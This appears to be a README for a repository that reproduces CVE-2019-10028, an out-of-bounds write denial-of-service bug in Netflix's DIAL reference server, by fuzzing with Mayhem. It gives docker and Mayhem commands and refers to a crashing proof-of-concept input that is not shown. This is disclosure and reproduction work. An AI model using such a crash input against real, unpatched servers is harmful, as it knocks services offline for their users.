This repo replicates finding CVE-2019-10028, a denial of service bug caused by an out of bounds write in a Netflix Dial protocol reference server (CVSS Score: 7.5).
We reported this bug responsibly to the maintainers, with the fix implemented here.
Note: since this finds the bug in an unmodified binary (a network target), it can only be found by fuzzers that support network fuzzing (such as Mayhem).
Assuming you just want to build the docker image, run:
docker build -t forallsecure/netflix-cve-2019-10028 .If you don't want to build locally, you can pull a pre-built image directly from dockerhub:
docker pull forallsecure/netflix-cve-2019-10028Change to the netflix-cve-2019-10028 folder and run:
mayhem run mayhem/dialand watch Mayhem replicate the bug! This bug takes some time (~6 hours) to find but be patient!
Since this is a uninstrumented network binary, it is not possible to easily fuzz locally. However, [Mayhem] (https://www.forallsecure.com/solutions/devsecops/) can easily take care of this!
We have included a proof of concept output under the poc
directory.
Note: Fuzzing has some degree of non-determinism, so when you run yourself you may not get exactly this file. This is expected; your output should still trigger the Netflix dial bug.
This bug was originally found by ForAllSecure intern Zion Basque. As such, this bug has since been fixed by project maintainers.